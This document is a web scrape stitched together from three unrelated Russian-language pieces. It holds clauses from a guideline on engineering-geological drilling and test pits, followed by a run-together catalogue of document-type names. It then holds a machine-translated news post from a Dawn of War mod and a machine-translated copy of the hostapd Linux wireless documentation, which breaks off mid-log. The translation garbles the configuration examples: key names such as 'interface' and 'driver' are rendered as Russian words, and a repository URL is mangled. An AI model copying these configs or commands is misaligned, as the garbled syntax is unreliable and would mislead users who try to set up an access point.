4.5. Ограничением рейса при бурении является искусственное прекращение процесса бурения, вызванное необходимостью более точного определения разреза, выделения слоев, прослоек и включений, сохранением керна, повышением выхода керна. Ограничение рейса при бурении должно быть оговорено в программе работ (предписании).
4.6. Способы бурения — шнековый, поточный и рейсовый и медленно-вращательный допускается применять:
для проходки разведочных скважин — в разрезах, представленных однородными и незакономерно изменяющимися песками при изысканиях под сооружения III класса;
для проходки специальных скважин в непосредственной близости от пройденных ранее разведочных скважин;
для отбора проб грунтов на определение коррозионной активности лабораторными методами;
для проходки верхнего сезонно-мерзлого слоя грунта при забурке скважин.
Во всех случаях применение указанных способов бурения должно быть обосновано в программе изысканий.
4.7. Режимы бурения инженерно-геологических скважин разрабатываются применительно к конкретным геологическим условиям на объекте изысканий в соответствии с требованиями, предъявляемыми программой производства изысканий к качеству инженерно-геологической документации.
4.8. В районах развития карста в качестве основного способа бурения следует принимать колонковый — буровыми установками со свободной подачей инструмента. Бурение следует производить с тщательным хронометражем, фиксируя механическую скорость, провалы инструмента с точным указанием интервалов, баланс расхода и характер циркуляции промывочной жидкости или воздуха при бурении с промывкой и продувкой.
5.1. Бурение шурфов буровыми установками должно осуществляться с горизонтально ровного участка, очищенного от строительного мусора, кустарника и посторонних предметов. На крутых косогорах следует создавать выемки в виде уступа или траншеи.
5.2. При подготовке рабочей площадки необходимо учитывать значительный объем извлекаемого грунта, количество которого определяется расчетом, для обустройства отвалов грунта. Рекомендуемыми типами отвалов породы при бурении шурфов являются полукольцевые ленточные и веерообразные, полукольцевые отвалы целесообразны при незначительной глубине выработок.
Ленточные и веерообразные отвалы обустраиваются, когда отсыпка породы в полукольцевой невозможна (на косогорах, когда размер площадки невелик и т.п.).
5.3. Бурение шурфов производится вращательным, ударно-канатным и комбинированным способами.
Способ и диаметр бурения шурфов-скважин следует выбирать в зависимости от видов и свойств проходимых грунтов, назначения и глубины шурфов.
Вращательный способ наиболее целесообразно применять при проходке шурфов диаметром 600-1300 мм, глубиной до 6 м. При вращательном способе бурение должно осуществляться без промывки и подлива воды. Углубка на один рейс устанавливается в пределах 0,2-0,5 м.
Ударно-канатный способ целесообразно применять при проходке шурфов диаметром 600-900 мм на глубину до 10 м в глинистых грунтах, лессах и лессовидных грунтах.
Применение ударного способа бурения шурфов в грунтах с неустойчивыми стенками не допускается.
Для проходки шурфов глубиной более 10 м наиболее рациональным является комбинированный способ бурения. Начальный интервал шурфа до глубины 3-4 м проходится вращательным способом. Диаметр бура для вращательного бурения должен быть на 150-200 мм больше диаметра наконечника для ударного бурения, которым производится дальнейшая проходка до проектной глубины.
При вращательном бурении шурфов частота вращения снаряда не должна превышать 80 об/мин. Высота сбрасывания инструмента при ударном бурении не должна превышать 6 м. Максимальный диаметр наконечника ударного бурения шурфов — 900 мм.
5.4. При проходке шурфов бурением, когда предполагается их использование в течение достаточно длительного времени, а также закреплены крепью, устойчивой к воздействию горного давления (обсадные трубы, секционная металлическая трубная крепь. Телескопическая трубная крепь и т.п.).
При проходке шурфа в устойчивых грунтах при использовании в течение короткого промежутка времени (например, только для отбора монолитов) допускается использование предохранительной крепи, обеспечивающей безопасность проведения работ на забое от случайных вывалов грунта из стенок. Применение предохранительной крепи допускается только после проходки шурфов на полную глубину. Производить дальнейшую углубку частично закрепленного шурфа запрещается. В качестве предохранительной крепи может использоваться сетчатая или эластичная крепь с жестким металлическим каркасом.
6.1. При инженерно-геологических изысканиях горным способом (механизированным и вручную) проходятся следующие виды горноразведочных выработок: расчистки, конуши, канавы, траншеи, шурфы, дудки, шахты.
6.2. На проведение горноразведочных выработок горным способом, кроме конуш, должен составляться проект производства работ, где указывается способ проходки (ручной, механизированный), оборудование, паспорт крепления и мероприятия, обеспечивающие безопасность проведения работ.
7.1. Рабочие журналы проведения горных выработок должны оформляться в соответствии с требованиями, изложенными в «Пособии по составлению и оформлению документации инженерных изысканий для строительства». Часть 2, М., Стройиздат, 1986.
7.2. Термины и определения, применяемые в документации горных выработок, должны соответствовать приведенным в государственных стандартах.
Искать все виды документовДокументы неопределённого видаISOАвиационные правилаАльбомАпелляционное определениеАТКАТК-РЭАТПЭАТРВИВМРВМУВНВНиРВНКРВНМДВНПВНПБВНТМ/МЧМ СССРВНТПВНТП/МПСВНЭВОМВПНРМВППБВРДВРДСВременное положениеВременное руководствоВременные методические рекомендацииВременные нормативыВременные рекомендацииВременные указанияВременный порядокВрТЕРВрТЕРрВрТЭСНВрТЭСНрВСНВСН АСВСН ВКВСН-АПКВСПВСТПВТУВТУ МММПВТУ НКММПВУП СНЭВУППВУТПВыпускГКИНПГКИНП (ОНТА)ГНГОСТГОСТ CEN/TRГОСТ CISPRГОСТ ENГОСТ EN ISOГОСТ EN/TSГОСТ IECГОСТ IEC/PASГОСТ IEC/TRГОСТ IEC/TSГОСТ ISOГОСТ ISO GuideГОСТ ISO/DISГОСТ ISO/HL7ГОСТ ISO/IECГОСТ ISO/IEC GuideГОСТ ISO/TRГОСТ ISO/TSГОСТ OIML RГОСТ ЕНГОСТ ИСОГОСТ ИСО/МЭКГОСТ ИСО/ТОГОСТ ИСО/ТСГОСТ МЭКГОСТ РГОСТ Р ЕНГОСТ Р ЕН ИСОГОСТ Р ИСОГОСТ Р ИСО/HL7ГОСТ Р ИСО/АСТМГОСТ Р ИСО/МЭКГОСТ Р ИСО/МЭК МФСГОСТ Р ИСО/МЭК ТОГОСТ Р ИСО/ТОГОСТ Р ИСО/ТСГОСТ Р ИСО/ТУГОСТ Р МЭКГОСТ Р МЭК/ТОГОСТ Р МЭК/ТСГОСТ ЭД1ГСНГСНрГСССДГЭСНГЭСНмГЭСНмрГЭСНмтГЭСНпГЭСНПиТЕРГЭСНПиТЕРрГЭСНрГЭСНсДИДиОРДирективное письмоДоговорДополнение к ВСНДополнение к РНиПДСЕКЕНВиРЕНВиР-ПЕНиРЕСДЗемЕТКСЖНМЗаключениеЗаконЗаконопроектЗональный типовой проектИИБТВИДИКИМИНИнструктивное письмоИнструкцияИнструкция НСАМИнформационно-методическое письмоИнформационно-технический сборникИнформационное письмоИнформацияИОТИРИСОИСО/TRИТНИТОсИТПИТСИЭСНИЭСНиЕР Республика КарелияККарта трудового процессаКарта-нарядКаталогКаталог-справочникККТКОКодексКОТКПОКСИКТКТПММ-МВИМВИМВНМВРМГСНМДМДКМДСМеждународные стандартыМетодикаМетодика НСАММетодические рекомендацииМетодические рекомендации к СПМетодические указанияМетодический документМетодическое пособиеМетодическое руководствоМИМИ БГЕИМИ УЯВИМИГКМММНМОДНМонтажные чертежиМос МУМосМРМосСанПинМППБМРМРДСМРОМРРМРТУМСанПиНМСНМСПМТМУМУ ОТ РММУКМЭКННАС ГАНБ ЖТНВННГЭАНДНДПНиТУНКНормыНормы времениНПНПБНПРМНРНРБНСПНТПНТП АПКНТП ЭППНТПДНТПСНТСНЦКРНЦСОДМОДНОЕРЖОЕРЖкрОЕРЖмОЕРЖмрОЕРЖпОЕРЖрОКОМТРМОНОНДОНКОНТПОПВОПКП АЭСОПНРМСОРДОСГиСППиНОСНОСН-АПКОСПОССПЖОССЦЖОСТОСТ 1ОСТ 2ОСТ 34ОСТ 4ОСТ 5ОСТ ВКСОСТ КЗ СНКОСТ НКЗагОСТ НКЛесОСТ НКМОСТ НКММПОСТ НКППОСТ НКПП и НКВТОСТ НКСМОСТ НКТПОСТ5ОСТНОСЭМЖОТРОТТПП ССФЖТПБПБПРВПБЭ НППБЯПВ НППВКМПВСРПГВУПереченьПиН АЭПисьмоПМГПНАЭПНД ФПНД Ф СБПНД Ф ТПНСТПОПоложениеПорядокПособиеПособие в развитие СНиППособие к ВНТППособие к ВСНПособие к МГСНПособие к МРПособие к РДПособие к РТМПособие к СНПособие к СНиППособие к СППособие к СТОПособие по применению СППостановлениеПОТ РПОЭСНрППБППБ-АСППБ-СППБВППБОППРПРПР РСКПР СМНПравилаПрактическое пособие к СППРБ АСПрейскурантПриказПротоколПСРр Калининградской областиПТБПТЭ |
Ultimate Apocalypse Mod (DOW SS) для Dawn of War
Июль Новости, 2020
НОВОСТИ ПОСЛЕДНИМ! Извините, дамы и господа, из-за отсутствия обновлений и поддержки в наши дни, но для тех, кто застрял с нами, СПАСИБО!
НОВОЕ ОБНОВЛЕНИЕ! Все верно, дамы и господа! Последний и последний патч UA перед капитальным ремонтом Ultimate Apocalypse! В течение следующего десятилетия было много жалоб, таких как баланс, оптимизация, несоответствия, бесполезные юниты, бесполезные фракции и многое другое…
Мы хотели бы показать вам. За кулисами наша работа еще не закончена, но есть некоторые разговоры … Неформально говоря, есть некоторые разговоры о команде (не говоря уже, кто), которая хотела бы работать на UA 1.9, пока я, лорд Сайларн, занимаюсь для UA 2.0! Второй шанс «Финального Армагеддона» (он же другая команда, которая не является командой ФА (это выражение)). UA 1.9 может работать над преданной и страстной + мотивированной командой, которая сможет предложить вам версию 1.9 быстрее, чем я когда-либо смогу.Несмотря на то, что я немного ниже среднего по моддингу, ЧТО ОНИ МОГУТ МОЛОДАТЬ И МОГУТ РАБОТАТЬ НА МОДЕ, и я рад, что есть кто-то, кто В восторге от работы над ним.
Я повторяю, хотя, неофициально говоря, нам все еще нужно строить планы. Я думаю об этом решении в конечном итоге по одной веской причине, возможно, по двум. Тем временем планы, которые я предпринял, слишком амбициозны и не будут реализованы в 2020 году, как я надеялся. За это я прошу прощения. Так что UA 2.0 для меня и X name 1.9 для вас, ребята в 2020 году.
Давайте добавим несколько шуток, ребята! У меня ломается спина, кончики пальцев бледнеют … ОЙ! Что это был за ускоряющийся снаряд? Оооо … Когда-то я был таким же искателем приключений, как ты … потом я взял стрелу в колено.
Пришло время заставить вас, ребята, больше не ждать и поставить 1,9 в 2020 году !!
Автор: FragJacker
Выпущено
1.88.74!
Версия 1.88,74 добавляет … Военачальник Титан! По сравнению с Legio Titanicus Titans, это устройство было специально разработано для Ultimate Apocalypse, переделано, реанимировано, ремастировано, перекодировано. Эти устройства в дополнение к большему будут в будущем для UA! Будет ли это версия 1.9 или раньше.
СКАЧАТЬ СЕЙЧАС! >>>> Mediafire.com
ПЕРЕД ЗАГРУЗКОЙ! Убедитесь, что вы удалили старые файлы перед установкой. На этот раз у нас нет установщика (и пока), и мы приносим свои извинения.Версия установщика будет на MOD DB.
CHANGELOG! >>>> Cdn.discordapp.com
МЫ ИЩЕМ ЛЮДЕЙ, КОТОРЫЕ ЗНАЮТ, КАК СОЗДАТЬ МОНТАЖНИКОВ
MOTY 2019 2 место!
До сих пор, большое спасибо сотрудникам MOD DB за отличное обновление Ultimate Apocalypse Mod! Пусть это будет бесплатно! Чтобы поднять вам настроение на 2020 год, вот некоторые кадры неизданного и частично эксклюзивного материала, который нигде не показывался.Мы оставляем эти изображения здесь для вас без дальнейших комментариев, наслаждайтесь;).
Выбор игроков — мод года 2019
Характерная чертаПериод голосования за 100 лучших модов завершен, и теперь пришло время объявить победителей конкурса модов года 2019, выбранного вами!
MOTY 2019 — Новости 4 2019
НовостиЗАКРЫТЫЙ РАССВЕТ ФАНАТОВ! UA снова попал в ТОП-100 MOD DB благодаря всем вашим голосам и огромное спасибо, ребята, даже в этот день.НО ЭТО …
Новости 3 2019
НовостиНовости — 2019 Привет всем! Сегодняшний анонс — выпуск следующей версии, версия 1.88.72 (патч)! Включая исправления AI, исправления сбоев, IDH против …
,ru: пользователи: документация: hostapd [Linux Wireless]
hostapd Страница документации по Linux
О хоста
Домашняя страница: http://w1.fi/hostapd/
hostapd — это IEEE 802.11 AP и IEEE 802.1X / WPA / WPA2 / EAP / RADIUS Authenticator . Эта страница посвящена документации Linux по ее внедрению и использованию. Пожалуйста, обратитесь к домашней странице hostapd для получения информации о других операционных системах.
Для связи с драйвером ядра hostapd должен использовать некоторый интерфейс. Все новые драйверы на базе cfg80211 (и mac80211), которые реализуют функциональные возможности AP, поддерживаются с использованием интерфейса nl80211 .
Для старых драйверов ядра hostapd содержит отдельные драйверы. Что касается Linux, есть 3 других драйвера, которые вы можете использовать:
Подсистема mac80211 перемещает все аспекты основного режима в пользовательское пространство. Это зависит от hostapd для обработки аутентификации клиентов, установки ключей шифрования, установки политики ротации ключей и других аспектов беспроводной инфраструктуры.Из-за этого старый метод выдачи «мастера режима iwconfig <беспроводной интерфейс>» больше не работает. Это также означает, что программам пользовательского пространства, таким как hostapd, нужен способ отправки / получения фреймов управления.
Подробная информация о NL80211
В старые времена для получения и отправки кадров управления требовался интерфейс режима монитора. Вам нужен один интерфейс, работающий в режиме master для стандартного трафика , и другой для аутентификации, управления ключами и т. Д. Второй интерфейс не требует какого-либо специального API ; доступ к нему осуществлялся через стандартный сокет Linux.Этот метод все еще поддерживается драйвером nl80211 как запасной вариант.
Позднее в nl80211 были реализованы специальные команды для отправки кадров управления (NL80211_CMD_FRAME) и подписки на них (NL80211_CMD_REGISTER_FRAME). Это позволило пользовательскому пространству обрабатывать беспроводную инфраструктуру, используя только один интерфейс. В настоящее время это предпочтительный метод, который можно использовать со всеми драйверами mac80211, реализующими режим AP.
Получение hostapd
Использование вашего дистрибутива hostapd
Желательно попробовать версию hostapd вашего дистрибутива, прежде чем вы найдете время для компиляции и установки своей собственной копии.Это облегчит дальнейшее обслуживание, так как вы сможете использовать сценарии инициализации, поставляемые с дистрибутивом, и hostapd будет также обновляться им. Если ваш дистрибутив поставляется с версией 0.6.8 или более поздней, вы можете протестировать эту минимальную конфигурацию, создав файл hostapd-minimal.conf:
# change wlan0 на ваше беспроводное устройство Интерфейс = wlan0 водитель = nl80211 = тест SSID канал = 1
Если эта конфигурация выдает ошибку с чем-то вроде:
hostapd $ sudo hostapd ./hostapd-minimal.конф Файл конфигурации: ./hostapd-minimal.conf Строка 2: неверный / неизвестный драйвер 'nl80211' В файле конфигурации './hostapd-minimal.conf' найдено 1 ошибок
это означает, что ваш дистрибутив не поставляет hostapd с поддержкой драйверов nl80211, и вам нужно будет следовать инструкциям по сборке, которые следуют. Если это работает, вы можете перейти к разделу о настройке hostapd. Если нет, продолжайте.
Скачать и скомпилировать hostapd
Для использования hostapd с nl80211 требуется как минимум libnl-1.0 pre8 в этом выпуске представил genl, Generic Netlink, на который опирается nl80211. Большинство дистрибутивов уже выпускают этот или более поздний выпуск. Для компиляции в Fedora или других дистрибутивах, которые отделяют заголовки от двоичных файлов, вам нужен пакет libnl-devel.
На протяжении всего этого раздела версии будут упоминаться: x.y.z
Например: hostapd-0.6.8.tar.gz будет называться hostapd-x.y.z.tar.gz
Вы можете получить последнюю версию разработки hostapd из репозитория git с:
git clone git: // w1.ц / SRV / мерзавец / hostap.git cd hostap / hostapd
Или вы можете получить стабильную версию (рекомендуется 0.6.8 или более позднюю), загрузив tarball с http://w1.fi/hostapd/ следующим образом:
wget http://w1.fi/releases/hostapd-x.y.z.tar.gz tar xzvf hostapd-x.y.z.tar.gz cd hostapd-x.y.z / hostapd
Далее нам нужно настроить сборку hostapd для включения поддержки драйвера nl80211. Скопируйте defconfig в .config и откройте его в предпочитаемом вами текстовом редакторе. Кроме того, есть и другие опции, которые вы можете включить, например, 802.Поддержка 11n, если ваше оборудование может это сделать. Большинство других типов и функций шифрования не требуются для большинства приложений, поэтому, если вы спрашиваете, нужно ли вам включить его, вам, вероятно, не нужно.
cp defconfig .config vi .config
Теперь найдите эту строку:
# CONFIG_DRIVER_NL80211 = y
и раскомментируйте его, удалив знак «#». Повторите эти действия для других настроек, которые могут вас заинтересовать. Базовая конфигурация, в которой только эта строка не закомментирована, достаточна для запуска и запуска hostapd с аутентификацией и шифрованием WPA / WPA2.
Далее скомпилируйте hostapd:
сделать
Если это не удается с ошибками вроде:
driver_nl80211.c: 21: 31: предупреждение: netlink / genl / genl.h: нет такого файла или каталога driver_nl80211.c: 22: 33: предупреждение: netlink / genl / family.h: нет такого файла или каталога driver_nl80211.c: 23: 31: предупреждение: netlink / genl / ctrl.h: нет такого файла или каталога driver_nl80211.c: 24: 25: предупреждение: netlink / msg.h: нет такого файла или каталога driver_nl80211.c: 25: 26: предупреждение: netlink / attr.h: нет такого файла или каталога
вам нужно установить / обновить libnl-1.0pre8 (или позже). Если все идет хорошо и компиляция завершается, попробуйте минимальный hostapd еще раз, см. Выше раздел Использование hostapd вашего дистрибутива .
hostapd # ./hostapd ./hostapd-minimal.conf Файл конфигурации: ./hostapd-minimal.conf Использование интерфейса wlan1 с hwaddr 00: 0d: 0b: cf: 04: 40 и ssid 'test'
Если это начинается, как показано в примере, вы можете перейти к настройке hostapd. Если он не запускается и выдает ошибки о том, что драйвер не найден, просмотрите шаги, перечисленные выше, для повторной компиляции hostapd.Если он получает сообщения об ошибках:
Аппаратное обеспечение не поддерживает настроенный режим wlan0: IEEE 802.11 Hardware не поддерживает настроенный режим (2) Не удалось выбрать hw_mode и канал. (-2) wlan0: невозможно настроить интерфейс. rmdir [ctrl_interface]: нет такого файла или каталога
тогда это означает, что hw_mode (a, b или g) в файле конфигурации установлен на значение, не поддерживаемое аппаратным обеспечением.
Настройка hostapd
Создание базовой линии для конфигурации
Перед настройкой hostapd вам необходимо знать возможности клиентов, которые будут его использовать.Не все клиенты будут поддерживать все методы, которые вы захотите реализовать, поэтому необходимо установить базовую конфигурацию. Вы также захотите провести опрос своего региона, чтобы найти канал, на котором есть наименьшее количество других точек доступа. При выборе используемого канала важно помнить, что каналы перекрываются с любыми каналами в пределах 20 МГц.
Примеры базовой линии, которую вы можете установить:
Шифрование: wpa-psk + tkip Беспроводной режим: г Нормально для среды, которая должна поддерживать полу-устаревшие устройства, которые не поддерживают CCMP или WPA2
Шифрование: wpa2-psk + ccmp Беспроводной режим: g + n Нормально для среды, в которой установлено только самое современное аппаратное и программное обеспечение
Шифрование: wep Беспроводной режим: б Это наихудший сценарий, так как WEP сломан и может быть тривиально взломан.Не рассматривайте это как нечто большее, чем не допускать случайных халявщиков.
Как только вы нашли свою базовую линию, пришло время редактировать hostapd.conf. Параметры конфигурации будут разбиты на 3 раздела:
Общие параметры: параметры, которые вы, вероятно, захотите установить Дополнительные параметры: параметры, которые, вероятно, полезны, чтобы хотя бы знать, что у вас есть Дополнительные параметры: параметры, которые вам вряд ли понадобятся для большинства настроек
Общие опционы
Самый базовый набор опций для использования hostapd с драйвером nl80211 уже предоставлен как hostapd-minimal.конф. Это все, что вам нужно, если вам не нужно постоянно находиться на одном и том же канале, вам не нужно / не нужно шифрование и вам не нужно кричащее имя. Однако это нереальная идея в реальном мире.
Сначала мы настроим параметры беспроводного интерфейса, затем параметры беспроводной среды и, наконец, аутентификацию и шифрование.
Беспроводной интерфейс
Сводка настроек:
- Интерфейс
: сообщает hostapd, какой беспроводной интерфейс использовать.
- Мост
: установите мост, если используемый беспроводной интерфейс является частью интерфейса сетевого моста.
водитель: Для наших целей всегда nl80211. Если у вас есть только один беспроводной интерфейс, и он будет соединен с проводным интерфейсом, хорошим примером настройки будет:
= wlan0 мост = br0 водитель = nl80211
Беспроводная среда
Сводка настроек:
ssid: Устанавливает имя (SSID = идентификатор набора услуг) сети.Обратите внимание, что Wireless extensions / iwconfig неправильно называет это « essid ».
hw_mode: устанавливает режим работы интерфейса и разрешенные каналы. Допустимые значения зависят от аппаратного обеспечения, но всегда являются подмножеством a, b, g.
канал: Устанавливает канал для работы hostapd. Это должен быть канал, поддерживаемый режимом, установленным в hw_mode, а также разрешенным правилами вашей страны. SSID только для простоты настройки.Это то, что отображается в результатах сканирования, и может помочь в настройке ваших клиентов. Проверьте результаты сканирования для вашего региона и выберите имя.
hw_mode должен быть чем-то, что поддерживает все ваше оборудование. Установка этого значения в «g», вероятно, является наиболее распространенной настройкой, а также обеспечивает обратную совместимость с устройствами 802.11b. Обратите внимание, что это не то, где вы включаете поддержку 802.11n, так как 802.11n работает поверх функциональных возможностей 802.11a или 802.11g.
канал должен быть выбран так, чтобы он имел минимальное перекрытие с другими точками доступа или другими сетями в вашем регионе.Каналы 802.11 имеют общую ширину 20 МГц (4 канала) или ширину 10 МГц (2 канала) с каждой стороны. Это означает, что точка доступа на канале 3 будет мешать точке доступа на канале 1 или канале 5. Используйте это для выбора канала. Большинство точек доступа по умолчанию используют канал 6, поэтому в большинстве случаев вы можете использовать канал 1 или канал 11 для достижения наилучших результатов. Также обратите внимание, что доступные вам каналы полностью зависят от местных нормативных правил.
Пример хорошей нормальной установки:
ssid = MyNetwork hw_mode = г канал = 1
802.11n Сводка настроек
Стандарт 802.11n основан на указанных выше настройках и добавляет дополнительные функции. Если ваше оборудование не поддерживает 802.11n или вы не планируете его использовать, вы можете их игнорировать.
ieee80211n: установите 1, чтобы включить поддержку 802.11n, 0, чтобы отключить ее.
ht_capab: список функций 802.11n, поддерживаемых вашим устройством. Объяснение этих настроек в примере файла конфигурации весьма полезно, поэтому я предлагаю их прочитать.Вы можете использовать команду «iw list», чтобы найти краткий список возможностей вашего устройства.
Пример настроек:
wme_enabled = 1 ieee80211n = 1 ht_capab = [HT40 +] [SHORT-GI-40] [DSSS_CCK-40]
— Режим HT DSSS / CCK в 40 МГц: будет / может использовать DSSS / CCK в 40 МГц
Аутентификация и шифрование
В hostapd есть много вариантов аутентификации и шифрования. В этом разделе будут рассмотрены основы WEP / WPA / WPA2, а также некоторые другие часто используемые параметры.
Сводка настроек:
macaddr_acl: управляет фильтрацией MAC-адресов. MAC-адреса легко подделываются, поэтому используйте его только для усиления других мер безопасности, которые у вас есть.
auth_algs: это битовое поле, где первый бит (1) предназначен для открытой аутентификации, второй бит (2) предназначен для аутентификации с общим ключом (WEP), и оба (3) — оба.
ignore_broadcast_ssid: Включает / отключает трансляцию SSID.
wpa: это битовое поле, подобное auth_algs. Первый бит включает WPA1 (1), второй бит включает WPA2 (2), и оба активируют оба (3)
wpa_psk / wpa_passphrase: они устанавливают, каким будет предварительный общий ключ для аутентификации WPA.
wpa_key_mgmt: Это определяет, какие алгоритмы управления ключами клиент может аутентифицировать.
wpa_pairwise: управляет шифрованием данных WPA.
rsn_pairwise: управляет шифрованием данных WPA2.Во-первых, вычеркните macaddr_acl и ignore_broadcast_ssid из ваших приоритетов, поскольку они только повышают безопасность (и даже тогда, только незначительно). Кроме того, теперь WEP эффективно нарушен, поэтому, если вы НЕ ДОЛЖНЫ поддерживать WEP, вычеркните это из своего списка. Это просто оставляет WPA / WPA2. Согласно предварительному проекту стандарта, WPA2 требуется для 802.11n, и, поскольку в настоящее время известны атаки на WPA, WPA2 является рекомендуемым комплектом аутентификации и шифрования. К счастью, вы можете включить оба сразу. Если клиенты Windows будут подключаться, вы должны оставить шифрование CCMP вне опции wpa_pairwise, так как некоторые драйверы Windows имеют проблемы с системами, которые его поддерживают.
Хорошая отправная точка для точек доступа с поддержкой WPA и WPA2:
macaddr_acl = 0 auth_algs = 1 ignore_broadcast_ssid = 0 ВП = 3 wpa_passphrase = YourPassPhrase wpa_key_mgmt = WPA-PSK wpa_pairwise = TKIP rsn_pairwise = CCMP
Если же вы просто хотите поддерживать WPA2, вы можете использовать что-то вроде:
macaddr_acl = 0 auth_algs = 1 ignore_broadcast_ssid = 0 ВП = 2 wpa_passphrase = YourPassPhrase wpa_key_mgmt = WPA-PSK wpa_pairwise = TKIP rsn_pairwise = CCMP
Это должны быть все параметры, которые вам нужно будет изменить для базовой безопасной точки доступа с помощью hostapd с драйвером mac80211 с поддержкой AP.
Динамическая маркировка VLAN
hostapd может быть настроен для перемещения STA в отдельные VLAN на основе атрибутов туннеля RADIUS (как указано в RFC3580, http://tools.ietf.org/html/rfc3580#section-3.31):
туннельного типа = VLAN (13) Tunnel-Medium-Type = 802 Tunnel-Private-Group-ID = VLANID
Чтобы включить динамическое тегирование VLAN, необходимо установить следующие параметры в hostapd.conf:
dynamic_vlan = 1 vlan_file = / etc / hostapd.vlan
Значение 0 отключает динамическое тегирование VLAN, значение 1 позволяет динамическое тегирование VLAN, а значение 2 отклоняет аутентификацию, если сервер RADIUS не предоставляет соответствующие атрибуты туннеля.
Кроме того, hostapd должен знать, как должны называться интерфейсы VLAN. Это делается с помощью дополнительного файла конфигурации, как указано в vlan_file.
Пример /etc/hostapd.vlan:
1 wlan0.1 * wlan0. #
Это создаст интерфейс wlan0.1 поверх wlan0 и переместит все STA с Vlantag 1, предоставленным RADIUS, к этому интерфейсу. Вторая запись используется для динамического создания интерфейсов VLAN поверх wlan0; hostapd создаст интерфейс wlan0.vlantag для каждого отдельного vlantag, предоставляемого сервером RADIUS. Например, если STA (станция, устройство a.k.a.) связывается, а атрибуты сервера RADIUS содержат, vlantag 100, то hostapd создаст интерфейс wlan0.100 и отобразит STA на этот новый интерфейс.
IEEE 802.11i / RSN / WPA2 Предварительная аутентификация
Возможность роуминга IEEE 802.11 может быть улучшена путем предварительной аутентификации IEEE 802.1X / EAP в части полной аутентификации RSN и установления связи между ключами перед фактическим установлением связи с новой точкой доступа.Чтобы включить предварительную аутентификацию RSN, вам потребуется предварительная аутентификация RSN с поддержкой hostapd и запросчик STA, который также поддерживает и включает предварительную аутентификацию RSN. В этом разделе мы дадим краткое описание того, как включить rsn_preauthentication, что это делает, а также предоставим ссылки на то, как включить предварительную аутентификацию RSN в OpenWrt и включить предварительную аутентификацию RSN в wpa_supplicant, чтобы протестировать ее.
Прежде всего вы должны убедиться, что все ваши точки доступа будут использовать один и тот же SSID.
Чтобы убедиться, что ваши точки доступа и RADIUS находятся в одной сети / коммутаторе и могут общаться друг с другом, вы можете пинговать друг друга и просматривать выходные данные arp -a , вы должны увидеть MAC-адрес интерфейса моста AP друг друга на HW адрес столбца , а также MAC-адрес сервера RADIUS.
Например, скажем, у нас есть две точки доступа и один сервер RADIUS:
На ap136:
root @ ap136 ~ # arp -a IP-адрес типа HW Флаги HW-адрес Маска Устройство 192.168.4.139 0x1 0x2 00: 03: 7f: 11: 20: 00 * br-lan 192.168.4.1 0x1 0x2 68: 7f: 74: 3b: b1: 0d * br-lan 192.168.4.149 0x1 0x2 c8: 60: 00: da: 57: a7 * br-lan 192.168.4.109 0x1 0x2 00: 27: 10: 49: c6: 44 * br-lan
На db120:
root @ db120 ~ # arp -a IP-адрес типа HW Флаги HW-адрес Маска Устройство 192.168.4.109 0x1 0x2 00: 27: 10: 49: c6: 44 * br-lan 192.168.4.149 0x1 0x2 c8: 60: 00: da: 57: a7 * br-lan 192.168.4.1 0x1 0x2 68: 7f: 74: 3b: b1: 0d * br-lan 192.168.4.120 0x1 0x2 a2: 69: дБ: 89: 44: 88 * br-lan
Предполагая, что в этом примере сервер RADIUS находится на 192.168.4.149, в hostapd.conf вам необходимо включить:
auth_server_addr = 192.168.4.149 auth_server_port = 1812 auth_server_shared_secret = testing123 wpa_key_mgmt = WPA-EAP disable_pmksa_caching = 1 ОКС = 0 nas_identifier = eapol_key_index_workaround = 1 IEEE8021X = 1 wpa_key_mgmt = WPA-EAP wpa_group_rekey = 2000 auth_algs = 1 ВП = 2 wpa_pairwise = CCMP wpa_group_rekey = 2000 = mcgrof SSID-ap136-01 Мост = уш-лан rsn_preauth = 1 rsn_preauth_interfaces = br-lan
Полный пример conf файлов, сгенерированных выпусками OpenWrt AA:
Примечание: тот же SSID должен использоваться для предварительной аутентификации RSN.
Если вы используете OpenWrt, достаточно просто включить rsn_preauth, OpenWrt автоматически добавит rsn_preauth_interfaces для вас. Обычно это ваш мостовой интерфейс. Вам понадобятся два экземпляра hostapd, работающие на двух разных устройствах в одной сети / коммутаторе. Вам также потребуется RADIUS, установленный на сервере в той же сети / коммутаторе. FreeRADIUS является примером решения RADIUS для установки, читайте, как установить и настроить FreeRADIUS для аутентификации пользователей 802.11.
Обязательно протестируйте сервер RADIUS.Вы можете сделать это, используя программу eapol_test, часть кода hostapd.
cd wpa_supplicant / cp defconfig .config сделать eapol_test
Затем отредактируйте файл с именем eapol-config, который будет использоваться только для этого простого теста сервера RADIUS:
Сеть= { еар = TTLS eapol_flags = 0 key_mgmt = IEEE8021X идентичность = "TestUser" пароль = "testpassword" ca_cert = "/ главная / mcgrof / server.pem" phase2 = "AUTH = TTLS" }
Теперь вы сможете проверить этого пользователя следующим образом:
/ eapol_test -c eapol-config -a 192.168.x.x -p 1812 -s testing123 -r1
Если у вас есть две точки доступа, правильно настроенные с помощью rsn_preauth, как описано выше, и в одной и той же сети, теперь вы сможете настроить клиент для предварительной аутентификации RSN. Подробная информация об этом доступна в разделе документации по предварительной аутентификации RSN wpa_supplicant.
На сервере RADIUS вы хотите увидеть что-то вроде этого: Вторая аутентификация от STA до второй AP будет проходить через уже установленную сеть на первой AP после того, как она будет связана с ней.доступ Access-Request Id 0 192.168.4.120:51442 -> 192.168.4.149:1812 +0.000 Access-Challenge Id 0 192.168.4.149:1812 -> 192.168.4.120:51442 +0.000 Access-Request Id 1 192.168.4.120:51442 -> 192.168.4.149:1812 +0.009 Access-Challenge Id 1 192.168.4.149:1812 -> 192.168.4.120:51442 +0.012 Access-Request Id 2 192.168.4.120:51442 -> 192.168.4.149:1812 +0.017 Access-Challenge Id 2 192.168.4.149:1812 -> 192.168.4.120:51442 +0.018 Access-Request Id 3 192.168.4.120: 51442 -> 192.168.4.149:1812 +0.065 Access-Challenge Id 3 192.168.4.149:1812 -> 192.168.4.120:51442 +0.066 Access-Request Id 4 192.168.4.120:51442 -> 192.168.4.149:1812 +0.077 Access-Challenge Id 4 192.168.4.149:1812 -> 192.168.4.120:51442 +0,078 Access-Request Id 5 192.168.4.120:51442 -> 192.168.4.149:1812 +0.083 Access-Accept Id 5 192.168.4.149:1812 -> 192.168.4.120:51442 +0.083 Access-Request Id 0 192.168.4.139:35038 -> 192.168.4.149: 1812 +2.162 Access-Challenge Id 0 192.168.4.149:1812 -> 192.168.4.139:35038 +2.162 Access-Request Id 1 192.168.4.139:35038 -> 192.168.4.149:1812 +2.168 Access-Challenge Id 1 192.168.4.149:1812 -> 192.168.4.139:35038 +2.171 Access-Request 